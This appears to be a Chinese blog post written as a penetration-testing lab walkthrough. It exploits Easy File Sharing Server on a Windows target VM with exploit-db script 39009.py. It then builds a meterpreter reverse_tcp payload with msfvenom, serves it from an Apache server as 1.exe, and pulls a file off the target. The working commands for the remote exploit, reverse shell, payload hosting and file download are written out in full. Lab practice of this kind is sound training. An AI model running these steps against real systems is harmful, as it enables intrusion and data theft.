复现任务A

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

先在靶机中安装efssetup_20181,并找到靶机的IP地址:

2、利用Nmap扫描发现靶机(Windows)运行了该服务。

使用kali的nmap工具扫描靶机,发现运行了easy file sharing服务:

查找出和easy file sharing服务相关的漏洞:

输入指令:

searchsploit easy file sharing

得到结果:

3、利用该漏洞,使得靶机运行计算器。

利用此漏洞:

其所在位置为:

这是一个远程溢出漏洞,利用它可以在靶机上执行计算器程序。

使用该命令执行脚本:

输入指令:

python /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机IP 80

 回到靶机可以发现计算器已经运行:

 二、Metasploit应用

使用msfvenom指令生成被控端程序,参数lhost的值即为自己的kali主机的IP地址:

输入指令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=kali主机IP lport=5000 -f exe -o /root/payload.exe

 生成的文件可以在这里找到:

使用命令启动Metasploit:

msfconsole

 按顺序输入以下命令设置并启动主控端,然后等待靶机上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost kali的IP
set lport 5000
exploit

将payload文件传入靶机: 

这里有两种方法将文件传入靶机,一是直接复制进去,不过这种方法在实际的渗透过程中并不现实,所以介绍第二种方法:

输入指令 ‘cd’ 进入root文件夹,输入指令 ‘ls’ 可以看见 payload.exe 在该目录下:

cd/root

输入指令 ‘cp’ 复制 payload.exe 文件,然后启动apache2,把kali变成一个服务器(他人可以访问你的kali,下载文件),并把payload.exe文件改成名为1.exe放到网上:

cp ./payload.exe/var/www/html/1.exe
service apache2 start
service apache2 status

 

 打开靶机,输入网址:kali的IP/1.exe,下载1.exe文件并运行:

此时靶机已上线,输入命令 ‘ls’ 查看靶机的桌面都有什么文件(当然也可以输入指令 ‘cd’ 进入任意文件夹,例如进入C盘):

这里我们打算下载它在桌面的名为 ‘1.txt’ 的文件(上图白底一行),输入指令 download 1.txt(要下载的文件名) var(文件的保存路径) :

例如下载 1.txt这个文件:

download 1.txt var

显示已经下载成功:

 进入到文件的保存位置:

打开该文件:

再进入到靶机确认是否是所下载的文件:

显然内容是一样的,证明操作是成功有效的

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值